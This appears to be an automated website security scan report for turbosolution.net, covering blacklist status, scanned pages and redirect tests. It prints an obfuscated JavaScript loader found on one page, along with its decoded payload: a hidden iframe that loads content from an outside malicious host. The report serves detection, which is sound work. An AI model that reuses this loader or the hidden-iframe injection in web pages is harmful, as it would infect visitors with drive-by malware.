Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=turbosolution.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://turbosolution.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://turbosolution.net/ | 200 OK Content-Length: 419 Content-Type: text/html | clean |
http://turbosolution.net/cgi-bin/ | 403 Forbidden Content-Length: 17104 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://turbosolution.net/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://turbosolution.net/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://turbosolution.net/domains.txt | 200 OK Content-Length: 33316 Content-Type: text/plain | clean |
http://turbosolution.net/moving.page/ | 200 OK Content-Length: 886 Content-Type: text/html | clean |
http://turbosolution.net/suspended.page/ | 200 OK Content-Length: 9571 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) jl="707b776179717a603a63667d60713c36287d72667579713467667729337c6060642e3b3b707d737d6075787d7a67647d6675607d7b7a3a7127236e3a777a3b60717871777b793b3334637d70607c29332533347c717d737c60293325333467606d78712933627d677d767d787d606d2e347c7d7070717a2f332a283b7d72667579712a363d2f67616d766029365a755a362f7a7a7d716e7a29365a755a362f";jr="function mn(){ixho=Math.PI;vjjwlf=parseInt;ep='length';heqf=vjjwlf(~((ixho&ixho)|(~ixho&ixho)&(ixho&~ixho)|(~ixho&~ixho)));am=vjjwlf(((heqf&heqf)|(~ Decoded script: function mn(){ixho=Math.PI;vjjwlf=parseInt;ep='length';heqf=vjjwlf(~((ixho&ixho)|(~ixho&ixho)&(ixho&~ixho)|(~ixho&~ixho)));am=vjjwlf(((heqf&heqf)|(~heqf&heqf)&(heqf&~heqf)|(~heqf&~heqf))&1);ebbj=am<<am;nniezn=heqf;suybt='';szgop=String.fromCharCode;ex=eval;for(pmfnc=heqf;pmfnc<jr[ep];pmfnc-=-am)nniezn+=jr.charCodeAt(pmfnc);nniezn%=unescape(heqf+unescape('%78')+(am<<6));for(pmfnc=heqf;pmfnc<jl[ep];pmfnc+=ebbj)suybt+=szgop(vjjwlf(h mn(); document.write("<iframe src='http://digitalinspiration.e37z.cn/telecom/' width='1' height='1' style='visibility: hidden;'></iframe>");suybt="NaN";nniezn="NaN"; document.write("<iframe src='http://digitalinspiration.e37z.cn/telecom/' width='1' height='1' style='visibility: hidden;'></iframe>");suybt="NaN";nniezn="NaN"; <iframe src='http://digitalinspiration.e37z.cn/telecom/' width='1' height='1' style='visibility: hidden;'></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: turbosolution.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:07:52 GMT
Server: nginx/1.6.2
Content-Length: 419
Content-Type: text/html;charset=ISO-8859-1
...419 bytes of data.
GET / HTTP/1.1
Host: turbosolution.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:07:52 GMT
Server: nginx/1.6.2
Content-Length: 419
Content-Type: text/html;charset=ISO-8859-1
...419 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: turbosolution.net
Referer: http://www.google.com/search?q=turbosolution.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: turbosolution.net
Referer: http://www.google.com/search?q=turbosolution.net
Result:
The result is similar to the first query. There are no suspicious redirects found.